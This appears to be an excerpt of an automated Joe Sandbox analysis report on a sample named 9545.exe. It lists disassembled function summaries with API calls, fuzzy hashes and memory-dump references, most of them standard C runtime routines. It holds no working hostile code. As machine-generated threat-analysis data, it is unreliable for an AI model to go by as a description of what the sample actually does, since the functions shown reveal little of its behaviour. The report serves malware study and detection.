                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: api-ms-$ext-ms-
                                                • API String ID: 0-537541572
                                                • Opcode ID: cd99c67478510a568a702637957373e58736f5118e826c2dabdaac084e6a559c
                                                • Instruction ID: 8d9e03d8115d395c102edb9147275ac8937ffad1e36332a942d023680dac622b
                                                • Opcode Fuzzy Hash: cd99c67478510a568a702637957373e58736f5118e826c2dabdaac084e6a559c
                                                • Instruction Fuzzy Hash: 1D21A532A01364BBCB216B279C45B2E77599F117A0F290572EDC9B7292D731ED00C9F0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00DF2B43: _free.LIBCMT ref: 00DF2B68
                                                • _free.LIBCMT ref: 00DF2BC9
                                                  • Part of subcall function 00DEED91: HeapFree.KERNEL32(00000000,00000000,?,00DF2B6D,?,00000000,?,?,?,00DF2B94,?,00000007,?,?,00DF2F96,?), ref: 00DEEDA7
                                                  • Part of subcall function 00DEED91: GetLastError.KERNEL32(?,?,00DF2B6D,?,00000000,?,?,?,00DF2B94,?,00000007,?,?,00DF2F96,?,?), ref: 00DEEDB9
                                                • _free.LIBCMT ref: 00DF2BD4
                                                • _free.LIBCMT ref: 00DF2BDF
                                                • _free.LIBCMT ref: 00DF2C33
                                                • _free.LIBCMT ref: 00DF2C3E
                                                • _free.LIBCMT ref: 00DF2C49
                                                • _free.LIBCMT ref: 00DF2C54
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 745ba4c7df38b0c8b3501d58b22aa89868de86b005191e755d783c3d27d16807
                                                • Instruction ID: 8793fd15de2d551725643c5179c88c27406a729c575f63c3fd232cecd6a292a2
                                                • Opcode Fuzzy Hash: 745ba4c7df38b0c8b3501d58b22aa89868de86b005191e755d783c3d27d16807
                                                • Instruction Fuzzy Hash: DE11FC71540B48AAD920BFB1CC87FEBBB9CDF04700F558815B7DD66062DA69A7044770
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetConsoleCP.KERNEL32(?,00DD59B0,00000000), ref: 00DF427E
                                                • __fassign.LIBCMT ref: 00DF445D
                                                • __fassign.LIBCMT ref: 00DF447A
                                                • WriteFile.KERNEL32(?,00DD59B0,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00DF44C2
                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00DF4502
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00DF45AE
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileWrite__fassign$ConsoleErrorLast
                                                • String ID:
                                                • API String ID: 4031098158-0
                                                • Opcode ID: c2b775b9876737d2c64a55d004cc8518981c8453239f627a96e28be803f7e159
                                                • Instruction ID: 369eda0db7910ed0febffec0bd8b276a839f428555b9b159da6ec28d8b5c3ff3
                                                • Opcode Fuzzy Hash: c2b775b9876737d2c64a55d004cc8518981c8453239f627a96e28be803f7e159
                                                • Instruction Fuzzy Hash: 66D18B71D0025C9FCB15CFE8C880AFEBBB5EF48314F29816AE955BB351D631A946CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetLastError.KERNEL32(?,?,00DE9FC7,00DE9BB7,00DE93FC), ref: 00DE9FDE
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00DE9FEC
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00DEA005
                                                • SetLastError.KERNEL32(00000000,00DE9FC7,00DE9BB7,00DE93FC), ref: 00DEA057
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLastValue___vcrt_
                                                • String ID:
                                                • API String ID: 3852720340-0
                                                • Opcode ID: bccfab6aafd3dc99af0c320c4cd5d2c3476a77db173987389399904c2400ffef
                                                • Instruction ID: 4aa3aad09cda22170c574caa0131ea171504c7ca0a50ac3f01fcaeacf2b00dc6
                                                • Opcode Fuzzy Hash: bccfab6aafd3dc99af0c320c4cd5d2c3476a77db173987389399904c2400ffef
                                                • Instruction Fuzzy Hash: AB0124326093965EE6343A7BBC85A5B2755EF243B0B38023AF210610F4EF136C4856B6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\9545.exe, xrefs: 00DF1771
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: C:\Users\user\AppData\Local\Temp\9545.exe
                                                • API String ID: 0-1776105196
                                                • Opcode ID: 847a99365e14eaf2b4beb9ed286d0975b6105786e1076bec881bd2e188b92869
                                                • Instruction ID: 29584289bddd66475669111cb3c170b7fc6d83d160712defb94898026d95b2d8
                                                • Opcode Fuzzy Hash: 847a99365e14eaf2b4beb9ed286d0975b6105786e1076bec881bd2e188b92869
                                                • Instruction Fuzzy Hash: DF218E7560024DFFDB11AF668D8093B77ADEF003A4B168528FA299B151EB31EC51C7B0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _wcsrchr
                                                • String ID: .bat$.cmd$.com$.exe
                                                • API String ID: 1752292252-4019086052
                                                • Opcode ID: 53b5aacf386fde68e7495474a6eaf3723429ca38d85148fe10d6a9fc0721700a
                                                • Instruction ID: 6facff8130e702f801abd0970762cfe96e665448f715123ac73acb3c9d4cb423
                                                • Opcode Fuzzy Hash: 53b5aacf386fde68e7495474a6eaf3723429ca38d85148fe10d6a9fc0721700a
                                                • Instruction Fuzzy Hash: 58014E3B6147A5256628341E5D027371BCCDB81BB473B902AF998FB1C2ED59DC4341F1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: api-ms-
                                                • API String ID: 0-2084034818
                                                • Opcode ID: 02cabb5a6f4608c2f696736f37644e8fea0d8d02f98efc6566a31ea079f4cae2
                                                • Instruction ID: bca86c3bfbb9a6ab76df45b121ba0002ce2e304380e7b87b8389f743ef5d73cd
                                                • Opcode Fuzzy Hash: 02cabb5a6f4608c2f696736f37644e8fea0d8d02f98efc6566a31ea079f4cae2
                                                • Instruction Fuzzy Hash: EA116331A053A1AFCB32AB679C95A5B77649B027B0F190512E995B7290DB30FD40D6F0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00DEC118,00DEF73E,?,00DEC0E0,00DEC666,?,00DEF73E), ref: 00DEC138
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00DEC14B
                                                • FreeLibrary.KERNEL32(00000000,?,?,00DEC118,00DEF73E,?,00DEC0E0,00DEC666,?,00DEF73E), ref: 00DEC16E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 167ce70893b8a237723d73c1bd66180819c7b0ca697098cd9755e15502cf66e5
                                                • Instruction ID: eefc52c0d27440d6db8c5f814846f6cf9407f60eeb23021262959ecbaddf32ad
                                                • Opcode Fuzzy Hash: 167ce70893b8a237723d73c1bd66180819c7b0ca697098cd9755e15502cf66e5
                                                • Instruction Fuzzy Hash: F6F0A030601318FFDB21AB52DD0DB9E7BB8EF41B56F140060F900B50A1DB718E85EBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00DEC820), ref: 00DEC910
                                                • GetFileInformationByHandle.KERNEL32(?,?), ref: 00DEC96A
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00DEC820,?,000000FF,00000000,00000000), ref: 00DEC9F8
                                                • __dosmaperr.LIBCMT ref: 00DEC9FF
                                                • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00DECA3C
                                                  • Part of subcall function 00DECC64: __dosmaperr.LIBCMT ref: 00DECC99
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                • String ID:
                                                • API String ID: 1206951868-0
                                                • Opcode ID: bab2be24f80dc98763d455bc1d42a4277731e6ed52a514e773d8799727711de5
                                                • Instruction ID: cb37c66c20631d94fecad9edd9062ec5618278a6720314ac9b176b4089059f04
                                                • Opcode Fuzzy Hash: bab2be24f80dc98763d455bc1d42a4277731e6ed52a514e773d8799727711de5
                                                • Instruction Fuzzy Hash: CD413C71910388AFCB24EFA6DC459AFBBF9EF88300B145529F956E3211E7349846CB70
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • _free.LIBCMT ref: 00DF2AF2
                                                  • Part of subcall function 00DEED91: HeapFree.KERNEL32(00000000,00000000,?,00DF2B6D,?,00000000,?,?,?,00DF2B94,?,00000007,?,?,00DF2F96,?), ref: 00DEEDA7
                                                  • Part of subcall function 00DEED91: GetLastError.KERNEL32(?,?,00DF2B6D,?,00000000,?,?,?,00DF2B94,?,00000007,?,?,00DF2F96,?,?), ref: 00DEEDB9
                                                • _free.LIBCMT ref: 00DF2B04
                                                • _free.LIBCMT ref: 00DF2B16
                                                • _free.LIBCMT ref: 00DF2B28
                                                • _free.LIBCMT ref: 00DF2B3A
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 6f851d3427e8caee73eedf488e6762817461de9f373ba94ff97419bde4fe86ae
                                                • Instruction ID: 4467413e5d348a56ea5706228cb72e2b0b37e1873562571a7a1f0c451c468520
                                                • Opcode Fuzzy Hash: 6f851d3427e8caee73eedf488e6762817461de9f373ba94ff97419bde4fe86ae
                                                • Instruction Fuzzy Hash: EBF04F325003486BC624EF9AFCC2D2677E9EB0031036E8805F588E7515CA72FCC08671
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free
                                                • String ID: *?
                                                • API String ID: 269201875-2564092906
                                                • Opcode ID: 8c971a5cba637384c98489c711587be2179562f223453e09340c6f4f70e5b2b2
                                                • Instruction ID: a8b3be9860a8707e38a04c163924d8402673eab6e0082b1b0168f2978a94e2a2
                                                • Opcode Fuzzy Hash: 8c971a5cba637384c98489c711587be2179562f223453e09340c6f4f70e5b2b2
                                                • Instruction Fuzzy Hash: 73613C79D00219DFDB14DFA9C8819EDFBF5EF48310B298169E945E7300D731AE418BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00DEA6E2
                                                • CatchIt.LIBVCRUNTIME ref: 00DEA7C8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CatchEncodePointer
                                                • String ID: MOC$RCC
                                                • API String ID: 1435073870-2084237596
                                                • Opcode ID: 77fd3734a7b34a6e5140516a65d803eef9d7d387e64f0f197dfa68a6f06a4fcc
                                                • Instruction ID: a23be9bd9f46992d40f573c59b483619b577a4f71da2c06a6722e8e2425e358c
                                                • Opcode Fuzzy Hash: 77fd3734a7b34a6e5140516a65d803eef9d7d387e64f0f197dfa68a6f06a4fcc
                                                • Instruction Fuzzy Hash: C441597190024AEFCF16EF99CD81AEEBBB5FF48304F188059F904A7251D335A950DB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AdjustPointer
                                                • String ID:
                                                • API String ID: 1740715915-0
                                                • Opcode ID: da8c48f0f97de5e24cd48fd722e2f5017f1d0b5a4aae79e19a62d7ea0e479b52
                                                • Instruction ID: 64524a901f0bd3475d9f463824102e44463dd4e38744e9d7c1b3ade61b8df685
                                                • Opcode Fuzzy Hash: da8c48f0f97de5e24cd48fd722e2f5017f1d0b5a4aae79e19a62d7ea0e479b52
                                                • Instruction Fuzzy Hash: 5751D1716013879FDB29AF1AD881B6AB7A4FF50311F18802DE94157291E731FD80D7B2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetVersionExW.KERNEL32(0000011C,?,5CAF3EEB,00000000), ref: 00DD55A9
                                                • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00DD5610
                                                • GetProcAddress.KERNEL32(00000000), ref: 00DD5617
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressHandleModuleProcVersion
                                                • String ID:
                                                • API String ID: 3310240892-0
                                                • Opcode ID: ec10074c6111a870684fd556f80cc87ba7738420377361d94b2e87454e3b1410
                                                • Instruction ID: 90aab1e6f3ad2b221880e72ab9a706eced0fd07bd7cfa565a42c709089744a7e
                                                • Opcode Fuzzy Hash: ec10074c6111a870684fd556f80cc87ba7738420377361d94b2e87454e3b1410
                                                • Instruction Fuzzy Hash: 1E512570D006089FDB14EB78DD497DDBB75EB45310F90429AE409A73C5EB359AC48BB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • _free.LIBCMT ref: 00DF67CE
                                                • _free.LIBCMT ref: 00DF67F7
                                                • SetEndOfFile.KERNEL32(00000000,00DF3D3B,00000000,00DEEC2E,?,?,?,?,?,?,?,00DF3D3B,00DEEC2E,00000000), ref: 00DF6829
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00DF3D3B,00DEEC2E,00000000,?,?,?,?,00000000), ref: 00DF6845
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFileLast
                                                • String ID:
                                                • API String ID: 1547350101-0
                                                • Opcode ID: 5aedc89b1e2fb9000c357a0122d7500825838eb1a35d5747180c65b48f7f29a6
                                                • Instruction ID: 4b8bef98843c3c4ac5647ae5f41cdf9938999fb83e32525a30c6e0489dd01311
                                                • Opcode Fuzzy Hash: 5aedc89b1e2fb9000c357a0122d7500825838eb1a35d5747180c65b48f7f29a6
                                                • Instruction Fuzzy Hash: 3441E432900249ABDB117FB9CC42BAE37B5EF44374F2A8514F624EB992EA34D8458770
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00DEC54F: _free.LIBCMT ref: 00DEC55D
                                                  • Part of subcall function 00DF20AF: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00DF6270,?,00000000,00000000), ref: 00DF2151
                                                • GetLastError.KERNEL32 ref: 00DF1140
                                                • __dosmaperr.LIBCMT ref: 00DF1147
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00DF1186
                                                • __dosmaperr.LIBCMT ref: 00DF118D
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                • String ID:
                                                • API String ID: 167067550-0
                                                • Opcode ID: 2682254d19d4feda202d0dd8ec706e4ca65327c836b9a20a8da7da436a76c48f
                                                • Instruction ID: 9722ddc96f32e7e427e5ec81a8fdb038bce43f04a93bc26a714ea7de55353292
                                                • Opcode Fuzzy Hash: 2682254d19d4feda202d0dd8ec706e4ca65327c836b9a20a8da7da436a76c48f
                                                • Instruction Fuzzy Hash: C721B27560030DEFAB20AF668C81A3B77ADEF00364716C519FB299B140DB31EC419BB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetLastError.KERNEL32(?,00000000,?,00DEC4CD,00000000,?,?,?,00DEC666,?), ref: 00DEF687
                                                • _free.LIBCMT ref: 00DEF6E4
                                                • _free.LIBCMT ref: 00DEF71A
                                                • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,00DEC666,?), ref: 00DEF725
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast_free
                                                • String ID:
                                                • API String ID: 2283115069-0
                                                • Opcode ID: 5091a133d981bf3e840702034f5d114291f8de86dc148c81f38b7b80044a4dd2
                                                • Instruction ID: 4243933a7195af0774a4e8e643e79f08fa6ccdea811400e3bb9fcca2fb2bd183
                                                • Opcode Fuzzy Hash: 5091a133d981bf3e840702034f5d114291f8de86dc148c81f38b7b80044a4dd2
                                                • Instruction Fuzzy Hash: FF11E57320078AAFD6113B7BDC85E6F2659DBC0374B394238F128B61E1EE728C8A4130
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetLastError.KERNEL32(?,?,?,00DECF35,00DEF2BD,?,?,00DE99B3,?,?,?,?,?,00DD20F3,?,?), ref: 00DEF7DE
                                                • _free.LIBCMT ref: 00DEF83B
                                                • _free.LIBCMT ref: 00DEF871
                                                • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00DE99B3,?,?,?,?,?,00DD20F3,?,?), ref: 00DEF87C
                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00DD0000, based on PE: true
                                                • Associated: 0000000E.00000002.418827104.0000000000DD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419055103.0000000000E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419093395.0000000000E0A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 0000000E.00000002.419119044.0000000000E0F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_dd0000_9545.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast_free
                                                • String ID:
                                                • API String ID: 2283115069-0
                                                • Opcode ID: 2dd80d3d45f5769736b1003ddfaa82324426ba9da2e35887428e1f20a456f4f0
